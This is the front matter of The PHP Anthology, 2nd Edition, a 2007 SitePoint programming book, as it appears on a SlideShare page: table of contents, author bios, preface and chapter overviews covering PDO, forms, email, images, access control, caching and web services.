SlideShare a Scribd company logo
The PHP Anthology
Summary of Contents
Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv

1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1

2. Using Databases with PDO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39

3. Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77

4. Dates and Times . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95

5. Forms, Tables, and Pretty URLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115

6. Working with Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147

7. Email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179

8. Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197

9. Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237

10. Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269

11. Caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363

12. XML and Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395

13. Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 435

A. PHP Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473

B. Hosting Provider Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483

C. Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489

D. Working with PEAR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497

Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 505
THE PHP
   ANTHOLOGY
101 ESSENTIAL TIPS, TRICKS & HACKS
                      BY DAVEY SHAFIK
             MATTHEW WEIER O’PHINNEY
                     LIGAYA TURMELLE
                        HARRY FUECKS
                           BEN BALBO
                          2ND EDITION
iv

     The PHP Anthology: 101 Essential Tips, Tricks & Hacks
     by Davey Shafik, Matthew Weier O’Phinney, Ligaya Turmelle, Harry Fuecks, and Ben
     Balbo

                                  Copyright © 2007 SitePoint Pty. Ltd.

     Expert Reviewer: Jason Sweat                        Editor: Georgina Laidlaw

     Managing Editor: Simon Mackie                       Editor: Hilary Reynolds

     Technical Editor: Andrew Tetlaw                     Index Editor: Fred Brown

     Technical Director: Kevin Yank                      Cover Design: Alex Walker

     Printing History:

        First Edition: December, 2003
        Second Edition: October, 2007

     Notice of Rights
     All rights reserved. No part of this book may be reproduced, stored in a retrieval system or transmitted
     in any form or by any means, without the prior written permission of the publisher, except in the case
     of brief quotations embedded in critical articles or reviews.


     Notice of Liability
     The author and publisher have made every effort to ensure the accuracy of the information herein.
     However, the information contained in this book is sold without warranty, either express or implied.
     Neither the authors and SitePoint Pty. Ltd., nor its dealers or distributors will be held liable for any
     damages to be caused either directly or indirectly by the instructions contained in this book, or by the
     software or hardware products described herein.


     Trademark Notice
     Rather than indicating every occurrence of a trademarked name as such, this book uses the names only
     in an editorial fashion and to the benefit of the trademark owner with no intention of infringement of
     the trademark.




                                         Published by SitePoint Pty. Ltd.


                                         424 Smith Street Collingwood

                                              VIC Australia 3066

                                           Web: www.sitepoint.com

                                         Email: business@sitepoint.com


                                            ISBN 978-0-9758419-9-0

                               Printed and bound in the United States of America
v

Ben Balbo

Ben Balbo was born in Germany, grew up in the UK, lives in Melbourne, and likes Guinness.
While he isn’t drinking Guinness (which is most of the time in Melbourne, as it just doesn’t
taste the same), he earns a living as a PHP developer and trainer, security consultant, and
Open Source developer. He has been known to talk in public about web development-related
topics, which comes as part of the package of being on the committees of both the Melbourne
PHP User Group and Open Source Developers’ Club. Although he wouldn’t admit this, he
participates at this level only in order to go to restaurants or pubs after the meetings.


Harry Fuecks

Harry Fuecks1 is a technical writer, programmer, and system engineer. He has worked in
corporate IT since 1994, having completed a Bachelor’s degree in Physics. He first came
across PHP in 1999, while putting together a small intranet. Today, he’s the lead developer
of a corporate extranet, where PHP plays an important role in delivering a unified platform
for numerous back office systems. In his off hours he writes technical articles for SitePoint
and runs phpPatterns,2 a site exploring PHP application design. Originally from the United
Kingdom, he now lives in Switzerland. Harry is the proud father of a beautiful baby girl who
keeps him busy all day (and night!).


Davey Shafik

Davey Shafik is a full-time PHP developer with ten years’ experience in PHP and related
technologies. An avid magazine writer, book author, and speaker, Davey keeps his mind
sharp by trying to tackle problems from a unique perspective from his home in Central
Florida where he lives with five cats and more computers.


Ligaya Turmelle

Ligaya Turmelle is a full-time goddess, occasional PHP programmer, and obsessive world
traveler. Actively involved with the PHP community as a founding Principal of phpwomen.org,
administrator at codewalkers.com, roving reporter for the Developer Zone on Zend.com, and
PHP blogger and long-time busybody of #phpc on freenode, she hopes to one day actually
meet the people she talks to. When not sitting at her computer staring at the screen, Ligaya
can usually be found either playing golf, scuba diving, snorkeling, kayaking, hiking, or just
playing with the dogs outside. Ligaya Turmelle is a Zend Certified Engineer.


1
    Harry Fuecks photo credit: Bruno Gerber http://www.flickr.com/photos/beegee74/231137320/
2
    http://www.phppatterns.com/
vi

     Matthew Weier O’Phinney

     Matthew Weier O’Phinney is a full-time father of two and spends his free time developing
     in PHP. He is a PEAR developer, core contributor to Zend Framework, and all-around PHP
     5 proponent—though PHP 6 cannot come soon enough for him.


     About the Expert Reviewer

     Jason Sweat has used PHP since 2001, where he was searching for a free—as in beer—substi­
     tute for IIS/ASP to create an accounting system for a home business. His Unix administrator
     pointed him towards Linux, Apache, and PHP. He has since adopted PHP as an intranet de­
     velopment standard at work, as well as using PHP in a Unix shell scripting environment. He
     is the author of php|architect's Guide to PHP Design Patterns (Toronto: Marco Tabini & As­
     sociates, 2005), and was a co-author of PHP Graphics Handbook (Birmingham: Wrox 2003),
     has published several articles for the Zend web site and for php|architect magazine, and has
     presented numerous talks on PHP at various conferences. Jason is a Zend Certified Engineer,
     and maintains a blog at http://blog.casey-sweat.us/.


     About the Technical Editor

     Andrew Tetlaw has been tinkering with web sites as a web developer since 1997 and has
     also worked as a high school English teacher, an English teacher in Japan, a window cleaner,
     a car washer, a kitchen hand, and a furniture salesman. At SitePoint he is dedicated to making
     the world a better place through the technical editing of SitePoint books and kits. He is also
     a busy father of five, enjoys coffee, and often neglects his blog at http://tetlaw.id.au/.


     About the Technical Director

     As Technical Director for SitePoint, Kevin Yank oversees all of its technical publica­
     tions—books, articles, newsletters, and blogs. He has written over 50 articles for SitePoint,
     but is best known for his book, Build Your Own Database Driven Website Using PHP &
     MySQL. Kevin lives in Melbourne, Australia, and enjoys performing improvised comedy
     theatre and flying light aircraft.


     About SitePoint

     SitePoint specializes in publishing fun, practical, and easy-to-understand content for web
     professionals. Visit http://www.sitepoint.com/ to access our books, newsletters, articles, and
     community forums.
Table of Contents

Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .   xv

       Who Should Read this Book? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvi

       What’s Covered in this Book? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii

       Running the Code Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xix

       The Book’s Web Site . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xx

       The SitePoint Forums . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi

       The SitePoint Newsletters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi

       Your Feedback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi

       Conventions Used in this Book . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxi



Chapter 1                  Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .                1

       Where do I get help? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

       What is OOP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

       How do I write portable PHP code? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

       Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38



Chapter 2                  Using Databases with PDO . . . . . . . . . . . 39

       What is PDO? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40

       How do I access a database? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

       How do I fetch data from a table? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

       How do I resolve errors in my SQL queries? . . . . . . . . . . . . . . . . . . . . . . . . 49

       How do I add data to, or modify data in, my database? . . . . . . . . . . . . . 53

       How do I protect my web site from an SQL injection attack? . . . . . . . . . 55

       How do I create flexible SQL statements? . . . . . . . . . . . . . . . . . . . . . . . . . 57

       How do I find out how many rows I’ve touched? . . . . . . . . . . . . . . . . . . . 59
viii

          How do I find out a new INSERT’s row number in an autoincrementing

          field? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

          How do I search my table? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63

          How do I work with transactions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65

          How do I use stored procedures with PDO? . . . . . . . . . . . . . . . . . . . . . . . . 67

          How do I back up my database? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69

          Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75



       Chapter 3              Strings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .         77

          How do I output strings safely? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79

          How do I preserve formatting? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81

          How do I strip HTML tags from text? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82

          How do I force text to wrap after a certain number of characters? . . . . 84

          How do I perform advanced search and replace operations? . . . . . . . . . 84

          How do I break up text into an array of lines? . . . . . . . . . . . . . . . . . . . . . 86

          How do I trim whitespace from text? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88

          How do I output formatted text? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88

          How do I validate submitted data? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90

          Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94



       Chapter 4              Dates and Times . . . . . . . . . . . . . . . . . . . . . . . . . . 95

          How do I use Unix timestamps? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96

          How do I obtain the current date? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98

          How do I find a day of the week? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101

          How do I find the number of days in a month? . . . . . . . . . . . . . . . . . . . 101

          How do I create a calendar? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102

          How do I store dates in MySQL? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107

          How do I format MySQL timestamps? . . . . . . . . . . . . . . . . . . . . . . . . . . . 109

          How do I perform date calculations using MySQL? . . . . . . . . . . . . . . . . 111

          Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
ix


Chapter 5              Forms, Tables, and Pretty URLs . . . 115

   How do I build HTML forms with PHP? . . . . . . . . . . . . . . . . . . . . . . . . . . 116

   How do I display data in a table? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127

   How do I display data in a sortable table? . . . . . . . . . . . . . . . . . . . . . . . . 130

   How do I create a customized data grid? . . . . . . . . . . . . . . . . . . . . . . . . 134

   How do I make “pretty” URLs in PHP? . . . . . . . . . . . . . . . . . . . . . . . . . . . 139

   Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145



Chapter 6              Working with Files . . . . . . . . . . . . . . . . . . . . . 147

   How do I read a local file? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148

   How do I use file handles? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153

   How do I modify a local file? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155

   How do I access information about a local file? . . . . . . . . . . . . . . . . . . . 157

   How do I examine directories with PHP? . . . . . . . . . . . . . . . . . . . . . . . . . 160

   How do I display PHP source code online? . . . . . . . . . . . . . . . . . . . . . . . 161

   How do I store configuration information in a file? . . . . . . . . . . . . . . . 163

   How do I access a file on a remote server? . . . . . . . . . . . . . . . . . . . . . . . 166

   How do I use FTP from PHP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167

   How do I manage file downloads with PHP? . . . . . . . . . . . . . . . . . . . . . . 170

   How do I create compressed ZIP/TAR files with PHP? . . . . . . . . . . . . . . 172

   How do I work with files using the Standard PHP Library in PHP
   5? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174

   Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177



Chapter 7              Email . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179

   How do I send a simple email? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179

   How do I simplify the generation of complex emails? . . . . . . . . . . . . . . 182

   How do I add attachments to messages? . . . . . . . . . . . . . . . . . . . . . . . . . 184

   How do I send HTML email? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
x

       How do I mail a message to a group of people? . . . . . . . . . . . . . . . . . . . 188

       How do I handle incoming mail with PHP? . . . . . . . . . . . . . . . . . . . . . . . 191

       How can I protect my site against email injection attacks? . . . . . . . . . 193

       Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195



    Chapter 8             Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .       197

       How do I specify the correct image MIME type? . . . . . . . . . . . . . . . . . . 198

       How do I create thumbnail images? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199

       How do I resize images without stretching them? . . . . . . . . . . . . . . . . . 202

       How can I put together a simple thumbnail gallery? . . . . . . . . . . . . . . . 214

       How do I extract EXIF information from images? . . . . . . . . . . . . . . . . . . 217

       How do I add a watermark to an image? . . . . . . . . . . . . . . . . . . . . . . . . . 220

       How do I display charts and graphs with PHP? . . . . . . . . . . . . . . . . . . . . 223

       How do I prevent the hotlinking of images? . . . . . . . . . . . . . . . . . . . . . . 230

       How do I create images that can be verified by humans only? . . . . . . . 234

       Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235



    Chapter 9             Error Handling . . . . . . . . . . . . . . . . . . . . . . . . . .                       237

       What error levels does PHP report? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238

       What built-in settings does PHP offer for error handling? . . . . . . . . . . 239

       How can I trigger PHP errors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241

       How do I implement a custom error handler with PHP? . . . . . . . . . . . . 242

       How do I log and report errors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247

       How can I use PHP exceptions for error handling? . . . . . . . . . . . . . . . . 248

       How do I create a custom Exception class? . . . . . . . . . . . . . . . . . . . . . 252

       How do I implement a custom exception handler with PHP? . . . . . . . . 257

       How can I handle PHP errors as if they were exceptions? . . . . . . . . . . . 260

       How do I display errors and exceptions gracefully? . . . . . . . . . . . . . . . . 261

       How do I redirect users to another page following an error
       condition? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265
xi

   Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267



Chapter 10            Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . 269

   How do I use HTTP authentication? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271

   How do I use sessions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277

   How do I create a session class? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281

   How do I create a class to control access to a section of the site? . . . . 283

   How do I build a registration system? . . . . . . . . . . . . . . . . . . . . . . . . . . . 297

   How do I deal with members who forget their passwords? . . . . . . . . . . 318

   How do I let users change their passwords? . . . . . . . . . . . . . . . . . . . . . . 330

   How to do I build a permissions system? . . . . . . . . . . . . . . . . . . . . . . . . . 339

   How do I store sessions in a database? . . . . . . . . . . . . . . . . . . . . . . . . . . 353

   Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362



Chapter 11            Caching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363

   How do I prevent web browsers from caching a page? . . . . . . . . . . . . . 365

   How do I control client-side caching? . . . . . . . . . . . . . . . . . . . . . . . . . . . 367

   How do I examine HTTP headers in my browser? . . . . . . . . . . . . . . . . . . 371

   How do I cache file downloads with Internet Explorer? . . . . . . . . . . . . 372

   How do I use output buffering for server-side caching? . . . . . . . . . . . . 373

   How do I cache just the parts of a page that change infrequently? . . 377

   How do I use PEAR::Cache_Lite for server-side caching? . . . . . . . . . . . 382

   What configuration options does Cache_Lite support? . . . . . . . . . . 385

   How do I purge the Cache_Lite cache? . . . . . . . . . . . . . . . . . . . . . . . . 389

   How do I cache function calls? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390

   Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392



Chapter 12            XML and Web Services . . . . . . . . . . . . . . . 395

   Which XML technologies are available in PHP 5? . . . . . . . . . . . . . . . . . . 396
xii

         Why should I use PHP’s XML extensions instead of PHP string

         functions? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396

         How do I parse an RSS feed? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398

         How do I generate an RSS feed? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405

         How do I search for a node or content in XML? . . . . . . . . . . . . . . . . . . . 409

         How can I consume XML-RPC web services? . . . . . . . . . . . . . . . . . . . . . . 412

         How do I serve my own XML-RPC web services? . . . . . . . . . . . . . . . . . . 416

         How can I consume SOAP web services? . . . . . . . . . . . . . . . . . . . . . . . . . 420

         How do I serve SOAP web services? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423

         How can I consume REST services? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425

         How can I serve REST services? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431

         Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 433



      Chapter 13             Best Practices . . . . . . . . . . . . . . . . . . . . . . . . . . . .                    435

         How do I track revisions to my project’s code? . . . . . . . . . . . . . . . . . . . . 436

         How can I maintain multiple versions of a single codebase? . . . . . . . . 438

         How can I write distributable code? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441

         How can I document my code for later reference by myself or

         others? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448

         How can I ensure future changes to my code won’t break current

         functionality? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 454

         How can I determine what remains to be tested? . . . . . . . . . . . . . . . . . 463

         I’ve reviewed some of my old code, and it’s horrible. How can I make

         it better? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467

         How can I deploy code safely? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468

         Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471



      Appendix A             PHP Configuration . . . . . . . . . . . . . . . . . . . . .                               473

         Configuration Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473

         Key Security and Portability Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
xiii

       Includes and Execution Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475

       Error-related Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 480

       Miscellaneous Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481



Appendix B                 Hosting Provider Checklist . . . . . . . . . . 483

       General Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483

       PHP-related Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485



Appendix C                 Security Checklist . . . . . . . . . . . . . . . . . . . . . . 489

       Top Security Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 489



Appendix D                 Working with PEAR . . . . . . . . . . . . . . . . . . . 497

       Installing PEAR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .    498

       The PEAR Package Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .                 501

       Installing Packages Manually . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .               503

       Alternatives to PEAR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .         504



Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .   505
The PHP Anthology
Preface

One of the great things about PHP is its vibrant and active community. Developers
enjoy many online meeting points, including the SitePoint Forums,1 where de­
velopers get together to help each other out with problems they face on a daily basis,
from the basics of how PHP works, to solving design problems like “How do I val­
idate a form?” As a way to get help, these communities are excellent—they’re replete
with all sorts of vital fragments you’ll need to make your projects successful. But
putting all that knowledge together into a solution that applies to your particular
situation can be a challenge. Often, community members assume other posters have
some degree of knowledge; frequently, you might spend a considerable amount of
time pulling together snippets from various posts, threads, and users (each of whom
has a different programming style) to gain a complete picture.

The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition is, first and
foremost, a compilation of the best solutions provided to common PHP questions
that turn up at the SitePoint Forums on a regular basis, combined with the experi­
ences and insights our authors have gained from their many years of work with
PHP.

What makes this book a little different from others on PHP is that it steps away from
a tutorial style, and instead focuses on the achievement of practical goals with a
minimum of effort. To that extent, you should be able to use many of the solutions
provided here in a plug-and-play manner, without having to read this book from
cover to cover. To aid you in your endeavours, each section follows a consistent
question-and-solution format. You should be able to scan the table of contents and
flip straight to the solution to your problem.

That said, threaded throughout these discussions is a hidden agenda. As well as
solutions, this book aims to introduce you to techniques that can save you effort,
and help you reduce the time it takes to complete and maintain your web-based
PHP applications.

Although it was originally conceived as a procedural programming language, in
recent years PHP has proven increasingly successful as a language for the develop­


1
    http://www.sitepoint.com/forums/forumdisplay.php?f=34
xvi

      ment of object oriented solutions. With the release of PHP 5, PHP gained a completely
      rewritten and more capable object model. This has been further reinforced by the
      fact that on July 13, 2007 the PHP development team made the end-of-life announce­
      ment for PHP 4.

      The object oriented paradigm seems to scare many PHP developers, and is often
      regarded as being off limits to all but the PHP gurus. What this book will show you
      is that you don’t need a computer science degree to take advantage of the object
      oriented features and class libraries available in PHP 5 today.

      The PHP Extension and Application Repository, known as PEAR,2 provides a
      growing collection of reusable and well-maintained solutions for architectural
      problems (such as web form generation and validation) regularly encountered by
      PHP developers around the world. Wherever possible in the development of the
      solutions provided in this book, we’ve made use of freely available libraries that
      our authors have personally found handy, and which have saved them many hours
      of development.

      The emphasis this book places on taking advantage of reusable components to build
      your PHP web applications reflects another step away from the focus of many current
      PHP-related books. Although you won’t find extensive discussions of object oriented
      application design, reading The PHP Anthology: 101 Essential Tips, Tricks & Hacks,
      2nd Edition from cover to cover will, through a process of osmosis, help you take
      your PHP coding skills to the next level, setting you well on your way to constructing
      applications that can stand the test of time.

      The PHP Anthology: 101 Essential Tips, Tricks & Hacks, 2nd Edition will equip
      you with the essentials with which you need to be confident when working the
      PHP engine, including a fast-paced primer on object oriented programming with
      PHP (see “What is OOP?” in Chapter 1). With that preparation out of the way, the
      book looks at solutions that could be applied to almost all PHP-based web applica­
      tions, the essentials of which you may already know, but have yet to fully grasp.


      Who Should Read this Book?
      If you’ve already gotten your feet wet with PHP, perhaps having read Kevin Yank’s

      Build Your Own Database Driven Website Using PHP & MySQL, 3rd Edition (Site­


      2
          http://pear.php.net/
xvii

Point, Melbourne, ISBN 0-9752402-1-8), and completed your first project or two
with PHP, then this is the book for you.

If you’ve been asking questions like "How do I validate a web page form?”, “How
do I add a watermark to my photos?”, or “How do I send automated email messages
from my web application?”, you’ll find the answers to those questions in this book.
If you have the drive to progress your skills or improve your web application through
concepts such as reusable components, caching performance, or web services, then
you will find this book to be an excellent primer.


What’s Covered in this Book?
Here’s what you’ll find in each of the chapters of this book:

Chapter 1: Introduction
   This chapter provides a useful guide to finding help through the PHP manual
   and other resources. It includes an introduction object oriented programming:
   a run-down of PHP’s class syntax, as well as a primer that explains how all the
   key elements of the object oriented paradigm apply to PHP. It’s essential prepar­
   atory reading for later chapters in this anthology. This chapter also provides
   tips for writing portable code, and gives us the chance to take a look at some of
   the main PHP configuration pitfalls.

Chapter 2: Using Databases with PDO
    This chapter provides you with everything you’ll need to get up to speed with
    the PHP Data Objects (PDO) extension. We start with the basics, covering im­
    portant topics such as how to write flexible SQL statements and avoid SQL in­
    jection attacks. We then delve into many lesser-known aspects, such as searching,
    working with transactions and stored procedures, and how to back up your
    database.

Chapter 3: Strings
   This chapter explores the details of handling content on your site. We’ll discuss
   string functions you can’t live without, along with the process for validating
   and filtering user-submitted content.
xviii

        Chapter 4: Dates and Times
           Here, you’ll learn how to how to use PHP’s date functions, and implement an
           online calendar. You’ll also obtain a solid grounding in the storage and manip­
           ulation of dates in MySQL.

        Chapter 5: Forms, Tables, and Pretty URLs
           The essentials of web page forms and tables are covered here. We’ll discuss the
           development of forms with PEAR::HTML_QuickForm, and you’ll see how to
           use PEAR::HTML_Table to implement data grids and paged result sets. We’ll
           also take a look at some tricks you can use with Apache to generate search engine
           friendly URLs.

        Chapter 6: Working with Files
           This chapter is a survival guide to working with files in PHP. Here, we’ll cover
           everything from gaining access to the local file system, to fetching files over a
           network using PHP’s FTP client. We’ll go on to learn how to create your own
           zipped archives with PEAR::Archive_Tar, and touch on the use of the Standard
           PHP Library.

        Chapter 7: Email
           In this chapter, we deal specifically with email-related solutions, showing you
           how to take full advantage of email with PHP. We’ll learn to successfully send
           HTML emails and attachments with help from PEAR::Mail and
           PEAR::Mail_Mime, and to use PHP to easily handle incoming mails delivered
           to your web server.

        Chapter 8: Images
           This chapter explores the creation of thumbnails and explains how to watermark
           images on your site. We’ll also discuss how you can prevent hotlinking from
           other sites, create an image gallery complete with Exif data, and produce a few
           professional charts and graphs—as well as CAPTCHA images—with JpGraph.

        Chapter 9: Error Handling
           Understand PHP’s error reporting mechanism, how to take advantage of PHP’s
           custom error handling features, and how to handle errors gracefully—with a
           focus on exception handling and custom exceptions—in this action-packed
           chapter.
xix

Chapter 10: Access Control
   Beginning with basic HTTP authentication, then moving on to application-level
   authentication, this chapter looks at the ways in which you can control access
   to your site. Later solutions look at implementing a user registration system,
   and creating a fine-grained access control system with users, groups, and per­
   missions.

Chapter 11: Caching
   This chapter takes the fundamental view that HTML is fastest, and shows you
   how you can take advantage of caching on both the client and server sides to
   reduce bandwidth usage and dramatically improve performance. It covers HTTP
   headers, output buffering, and using PEAR:Cache_Lite.

Chapter 12: XML and Web Services
   With XML rapidly becoming a crucial part of almost all web-based applications,
   this chapter explores the rich XML capabilities of PHP 5. Here, you’ll discover
   how easy it is to produce and consume web services based on RSS, XML-RPC,
   SOAP, and REST.

Chapter 13: Best Practices
   The goal of this chapter is to examine some of the techniques that have proven
   themselves in helping development projects succeed. The discussion covers
   code versioning, how to write distributable code, how to add API documentation
   to your work, how to reduce bugs with unit testing, and how to deploy code
   safely.


Running the Code Examples
To run the code examples in this book you will need to ensure you have all the re­
quired software, libraries, and extensions. Some of the examples make use of addi­
tional packages that will need to be installed separately. Where solutions requiring
additional packages are introduced you will find a link to the relevant web page;
be sure to read the documentation, including the installation instructions.
xx

     The following packages are used in the examples in this book:

     ■	 PHP 5.21 (including the GD, EXIF, and XML-RPC extensions)
     ■	 PEAR: http://pear.php.net/ (including Archive_Tar, Cache_Lite, HTML_Table,
        HTML_QuickForm, Mail, Net_FTP, Structures_DataGrid, and Validate)
     ■	 Zend Framework: http://framework.zend.com/
     ■	 JpGraph: http://www.aditus.nu/jpgraph/

